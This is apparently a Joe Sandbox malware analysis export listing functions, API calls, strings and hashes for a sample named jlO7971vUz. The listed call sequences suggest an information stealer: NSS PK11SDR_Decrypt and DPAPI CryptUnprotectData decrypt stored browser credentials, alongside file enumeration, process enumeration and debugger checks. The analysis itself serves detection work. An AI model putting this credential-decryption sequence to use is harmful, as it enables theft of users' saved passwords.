Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
String ID:
API String ID: 1510409361-0
Opcode ID: 59d20ebf02139a5eab72e0d1c68432276e97298615e8025ee56675f6f5e25fe8
Instruction ID: 9a8b8992ec093aa130a77ad18c6345d35a2d0634e2fa048d3bfa69d0e5f2eee0
Opcode Fuzzy Hash: 59d20ebf02139a5eab72e0d1c68432276e97298615e8025ee56675f6f5e25fe8
Instruction Fuzzy Hash: 3471C0B1E01255CFDB04CFA5DC84A6BB7B0BF84318F148629E52997B11E731D945CB91

Function 017EBFC0 Relevance: 16.6, APIs: 11, Instructions: 93stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 017EBFF3
lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,013BE7D8), ref: 017EC011
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 017EC01C
PK11_GetInternalKeySlot.NSS3 ref: 017EC02A
PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 017EC045
PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 017EC08B
memcpy.MSVCRT ref: 017EC0B2
lstrcat.KERNEL32(?,017FE51F), ref: 017EC0E3
lstrcat.KERNEL32(?,017FE562), ref: 017EC0F7
PK11_FreeSlot.NSS3(?), ref: 017EC101
lstrcat.KERNEL32(?,017FE563), ref: 017EC118

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: K11_lstrcat$Slot$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlenmemcpymemset
String ID:
API String ID: 3428224297-0
Opcode ID: 6d6e504ad8bbf2c2559863d20308ef5ff554d6a5102c0fb18a0a3730926c7b59
Instruction ID: 01337f8d0877cf2ca781e050ba50c59636c8a9cb718ad1c36f2209838a43e621
Opcode Fuzzy Hash: 6d6e504ad8bbf2c2559863d20308ef5ff554d6a5102c0fb18a0a3730926c7b59
Instruction Fuzzy Hash: 2B4154B8D0421DDBDB11CF94DD89BEEF7B8AF48344F1081A8E605A7284D7749A85CF91

Function 6C4E0FE0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 227COMMON

Download Yara Rule

APIs

Part of subcall function 6C4DCA30: EnterCriticalSection.KERNEL32(?,?,?,6C53F9C9,?,6C53F4DA,6C53F9C9,?,?,6C50369A), ref: 6C4DCA7A
Part of subcall function 6C4DCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C4DCB26

memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6C4E103E
EnterCriticalSection.KERNEL32(?), ref: 6C4E1139
LeaveCriticalSection.KERNEL32(?), ref: 6C4E1190
sqlite3_free.NSS3(00000000), ref: 6C4E1227
sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6C4E126E
sqlite3_free.NSS3(?), ref: 6C4E127F

Strings

Pfl, xrefs: 6C4E109E
delayed %dms for lock/sharing conflict at line %d, xrefs: 6C4E1267
winAccess, xrefs: 6C4E129B

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
String ID: Pfl$delayed %dms for lock/sharing conflict at line %d$winAccess
API String ID: 2733752649-2220496268
Opcode ID: 28d0bffa7e70d4be578a38ef78e58d5116ed79e98fee51414310fb2af745fa73
Instruction ID: 358c7ee7e2c0959c7b43d7c9640d366ebaf350b74d89977f0bb4d8bd1fa7cda0
Opcode Fuzzy Hash: 28d0bffa7e70d4be578a38ef78e58d5116ed79e98fee51414310fb2af745fa73
Instruction Fuzzy Hash: 0A714A317442019BEB04DF66ECD5E6E73B5FB8E316F160229E91187B81DB30E811C79A

Function 6C5A6C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C551C6F,00000000,00000004,?,?), ref: 6C5A6C3F

Part of subcall function 6C5FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5FC2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C551C6F,00000000,00000004,?,?), ref: 6C5A6C60
PR_ExplodeTime.NSS3(00000000,6C551C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C551C6F,00000000,00000004,?,?), ref: 6C5A6C94

Strings

gfff, xrefs: 6C5A6D30
gfff, xrefs: 6C5A6D9C
gfff, xrefs: 6C5A6CFD
gfff, xrefs: 6C5A6D66
gfff, xrefs: 6C5A6CF5

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: gfff$gfff$gfff$gfff$gfff
API String ID: 3534712800-180463219
Opcode ID: 485aed354216c7b620b08a1f32a44b0c42b5650915d5f879a1e958e90687c20b
Instruction ID: 186601a8f66df540e29428da76f10e83d32ce72923fcba8fb9057fe7d6f01604
Opcode Fuzzy Hash: 485aed354216c7b620b08a1f32a44b0c42b5650915d5f879a1e958e90687c20b
Instruction Fuzzy Hash: 44513B72B016494FC718CDADDC626DEBBDAABE4310F48C23AE441DB781DA38E906C751

Function 6C620F20 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 394stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,-00000001), ref: 6C621027
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C6210B2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C621353

Strings

%lld, xrefs: 6C62114B
'%.*q', xrefs: 6C621217, 6C621292
zeroblob(%d), xrefs: 6C621223
NULL, xrefs: 6C62119E
-- , xrefs: 6C620FF5
$, xrefs: 6C6212A0
%02x, xrefs: 6C6212F6

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: memcpy$strlen
String ID: $$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)
API String ID: 2619041689-2155869073
Opcode ID: eb7034da48b99c2db6f5d447da7e3b8d3d8d617d1244b4801b355c800f0aab42
Instruction ID: 9e55d5e2e0a6c5bcacd9b99f97a528d6b18115aa4b606be9703055c77d04e627
Opcode Fuzzy Hash: eb7034da48b99c2db6f5d447da7e3b8d3d8d617d1244b4801b355c800f0aab42
Instruction Fuzzy Hash: 40E18D71A0C3819BD714CF14C880AABBBF1AF86348F14891DE98587B51E776ED45CF4A

Function 017ED570 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

Part of subcall function 017F87D0: lstrlen.KERNEL32(?,017FE98C,?,00000000,017FE4C7), ref: 017F87E5
Part of subcall function 017F87D0: lstrcpy.KERNEL32(00000000), ref: 017F8824
Part of subcall function 017F87D0: lstrcat.KERNEL32(00000000,00000000), ref: 017F8832

Part of subcall function 017F86C0: lstrcpy.KERNEL32(?,017FE4C7), ref: 017F8725

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,017FE742), ref: 017ED5BE
StrCmpCA.SHLWAPI(?,017FED18), ref: 017ED60E
StrCmpCA.SHLWAPI(?,017FED1C), ref: 017ED624
FindNextFileA.KERNEL32(000000FF,?), ref: 017EDB3A
FindClose.KERNEL32(000000FF), ref: 017EDB4C

Strings

\*.*, xrefs: 017ED586

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: \*.*
API String ID: 2325840235-1173974218
Opcode ID: f4cc007d2c462fb941abf32d16fd02ac6177f45556f82da25152df697a4cb170
Instruction ID: 6c53cd4d86c3b89f4ca8fb25f3fecceb79661a514f2a0c13cb9fb916c163dfa4
Opcode Fuzzy Hash: f4cc007d2c462fb941abf32d16fd02ac6177f45556f82da25152df697a4cb170
Instruction Fuzzy Hash: D6F18E718141199ACF25EF60DC98EEFF378AF28300F4051DD921A625A5EF306B89CF66

Function 6C668D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C6B14E4,6C61CC70), ref: 6C668D47
PR_GetCurrentThread.NSS3 ref: 6C668D98

Part of subcall function 6C540F00: PR_GetPageSize.NSS3(6C540936,FFFFE8AE,?,6C4D16B7,00000000,?,6C540936,00000000,?,6C4D204A), ref: 6C540F1B
Part of subcall function 6C540F00: PR_NewLogModule.NSS3(clock,6C540936,FFFFE8AE,?,6C4D16B7,00000000,?,6C540936,00000000,?,6C4D204A), ref: 6C540F25

PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C668E7B
htons.WSOCK32(?), ref: 6C668EDB
PR_GetCurrentThread.NSS3 ref: 6C668F99
PR_GetCurrentThread.NSS3 ref: 6C66910A

Strings

%u.%u.%u.%u, xrefs: 6C668E74

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
String ID: %u.%u.%u.%u
API String ID: 1845059423-1542503432
Opcode ID: f4efea42585736a62cc67c36c88c67a24ef12820c3e1388849bda0b3e90629b0
Instruction ID: 148b6bcf70700b534f7c63c08c26daecf1af93c4b2dcb629ff1d0d2f47edc1c0
Opcode Fuzzy Hash: f4efea42585736a62cc67c36c88c67a24ef12820c3e1388849bda0b3e90629b0
Instruction Fuzzy Hash: 0002AA319052518FDB148F2BC4687AABBB2EF4331CF29825ACC915BEA1C331D945C796

Function 6C5E68E0 Relevance: 12.2, APIs: 8, Instructions: 241COMMON

Download Yara Rule

APIs

PR_GetIdentitiesLayer.NSS3 ref: 6C5E68FC
PR_EnterMonitor.NSS3 ref: 6C5E6924

Part of subcall function 6C619090: TlsGetValue.KERNEL32 ref: 6C6190AB
Part of subcall function 6C619090: TlsGetValue.KERNEL32 ref: 6C6190C9
Part of subcall function 6C619090: EnterCriticalSection.KERNEL32 ref: 6C6190E5
Part of subcall function 6C619090: TlsGetValue.KERNEL32 ref: 6C619116
Part of subcall function 6C619090: LeaveCriticalSection.KERNEL32 ref: 6C61913F

Part of subcall function 6C5407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C4D204A), ref: 6C5407AD
Part of subcall function 6C5407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4D204A), ref: 6C5407CD
Part of subcall function 6C5407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4D204A), ref: 6C5407D6
Part of subcall function 6C5407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C4D204A), ref: 6C5407E4
Part of subcall function 6C5407A0: TlsSetValue.KERNEL32(00000000,?,6C4D204A), ref: 6C540864
Part of subcall function 6C5407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C540880
Part of subcall function 6C5407A0: TlsSetValue.KERNEL32(00000000,?,?,6C4D204A), ref: 6C5408CB
Part of subcall function 6C5407A0: TlsGetValue.KERNEL32(?,?,6C4D204A), ref: 6C5408D7
Part of subcall function 6C5407A0: TlsGetValue.KERNEL32(?,?,6C4D204A), ref: 6C5408FB

PR_EnterMonitor.NSS3 ref: 6C5E693E
TlsGetValue.KERNEL32 ref: 6C5E6977
TlsGetValue.KERNEL32 ref: 6C5E69B8
PR_ExitMonitor.NSS3 ref: 6C5E6B1E
PR_ExitMonitor.NSS3 ref: 6C5E6B39
TlsGetValue.KERNEL32 ref: 6C5E6B62

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Value$Monitor$Enter$CriticalExitSectioncalloc$IdentitiesLayerLeave
String ID:
API String ID: 4003455268-0
Opcode ID: 3120f70f4bc98d16ed5853f407c7ce5c58f3b8e9c76ea140164f7c6c84001e19
Instruction ID: 9c351476faefc12aa2aabfe4ca98334003d318ed0403b3f7b8a9c949a69bd600
Opcode Fuzzy Hash: 3120f70f4bc98d16ed5853f407c7ce5c58f3b8e9c76ea140164f7c6c84001e19
Instruction Fuzzy Hash: 3B919074658304CBDB80EF2ECC8055D7BA6FB8B398B608A59C944CFA19DB71D841CB86

Function 6C530820 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 1448COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(00000000,00000001,00000001), ref: 6C5311D2

Strings

@, xrefs: 6C530B17
rows deleted, xrefs: 6C5317D2
authorizer malfunction, xrefs: 6C531BD2
not authorized, xrefs: 6C53175E, 6C531763

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: memset
String ID: @$authorizer malfunction$not authorized$rows deleted
API String ID: 2221118986-4041583037
Opcode ID: 60eb099ff7e9ee846e72ff64b5ffdc0aace362fe17fc4ded145015db5f8f30a7
Instruction ID: eee1c143bc654c9941d2f9853437743f5e460bcc6791c7e886cda4ff813f5e6e
Opcode Fuzzy Hash: 60eb099ff7e9ee846e72ff64b5ffdc0aace362fe17fc4ded145015db5f8f30a7
Instruction Fuzzy Hash: CED28E70E04269CFDB15CFA9C880B9EBBF1BF89308F149159D419ABB51E771E856CB80

Function 017F936E Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 017FA666
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 017FA67B
UnhandledExceptionFilter.KERNEL32(017FD690), ref: 017FA686
GetCurrentProcess.KERNEL32(C0000409), ref: 017FA6A2
TerminateProcess.KERNEL32(00000000), ref: 017FA6A9

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 8a5f0d105c0a9ba95c2e73053914e583020ebfa16154c0ba16e9ff19766a8313
Instruction ID: 8e7fba9a6093b7257494b953e420871babfc10d2af63599b425891a458675c64
Opcode Fuzzy Hash: 8a5f0d105c0a9ba95c2e73053914e583020ebfa16154c0ba16e9ff19766a8313
Instruction Fuzzy Hash: D721E2B4A1020CDFC7B2DF59E488A857BA5FB08315B415019F608C7358E7714B818F69

Function 017E6C40 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,017E7690,80000001,017F42AE,?,?,?,?,?,017E7690), ref: 017E6C4D
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,017E7690,80000001,017F42AE,?,?,?,?,?,017E7690,?), ref: 017E6C54
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 017E6C81
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,017E7690,80000001,017F42AE), ref: 017E6CA4
LocalFree.KERNEL32(?,?,?,?,?,?,017E7690,80000001,017F42AE,?,?,?,?,?,017E7690,?), ref: 017E6CAE

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 3657800372-0
Opcode ID: 379f37c13740590a89a7868a6294a9ea9436cda358570653332e28d336322655
Instruction ID: 774ebb9ecb2b2fc8cb3de5b181c21f56a503708c0d1a0623e71ad4ef88b487be
Opcode Fuzzy Hash: 379f37c13740590a89a7868a6294a9ea9436cda358570653332e28d336322655
Instruction Fuzzy Hash: E8011275E40308BBDB14DF94CD49F9E77B8EB48704F104558F709AB2C4D670AA118B64

Function 017F7510 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 017F752E
Process32First.KERNEL32(017FE4B7,00000128), ref: 017F7542
Process32Next.KERNEL32(017FE4B7,00000128), ref: 017F7557
StrCmpCA.SHLWAPI(?,00000000), ref: 017F756C
CloseHandle.KERNEL32(017FE4B7), ref: 017F758A

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 1d20d6b284e81ddc92fb4500d630d13a1bab117fc0fab41f1244fe2eb3ca584a
Instruction ID: 10c32cb709c6ce4fe71d68e1efe11aaac08323ae7df34d6e5b9250cf1aba3b66
Opcode Fuzzy Hash: 1d20d6b284e81ddc92fb4500d630d13a1bab117fc0fab41f1244fe2eb3ca584a
Instruction Fuzzy Hash: B3011E79A00208EBDB25DFA4C958BDEBBB9FB48300F10819DAA0997244DB749B41CF50

Function 6C66CDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C66D086
PR_Malloc.NSS3(00000001), ref: 6C66D0B9
PR_Free.NSS3(?), ref: 6C66D138

Strings

>, xrefs: 6C66CF5B

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: FreeMallocstrlen
String ID: >
API String ID: 1782319670-325317158
Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction ID: 3d4ac16307b656a82c9279646f52e7c6c5201afcb0cf13b2757e1b3af972a62b
Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction Fuzzy Hash: 39D15B62B459460BEF14487F8C613EAB7938783378F784325D5628BFE5E5598883C34B

Function 6C4EAC60 Relevance: 6.4, Strings: 5, Instructions: 181COMMON

Download Yara Rule

Strings

Pfl, xrefs: 6C4EADDB, 6C4EADF5, 6C4EAE6A
winUnlockReadLock, xrefs: 6C4EAE9F
0fl, xrefs: 6C4EACC0, 6C4EAD22, 6C4EAD5E, 6C4EAE45
winUnlock, xrefs: 6C4EAE18
pfl, xrefs: 6C4EADA7

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID:
String ID: 0fl$Pfl$pfl$winUnlock$winUnlockReadLock
API String ID: 0-4076317548
Opcode ID: 7fbb7ad4c6f8ca487ae23a46aa9ecf4b682990bfc6a1401b5fc01d16d2520822
Instruction ID: 21e02c2f1b530592f38620af99f978860320ee540dd9362a97bd495a7c3134d1
Opcode Fuzzy Hash: 7fbb7ad4c6f8ca487ae23a46aa9ecf4b682990bfc6a1401b5fc01d16d2520822
Instruction Fuzzy Hash: 3171AE716082449FDB04CF29E890EAABBF5FF8A314F15CA18F94997311D730A985CBD9

Function 6C60AD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

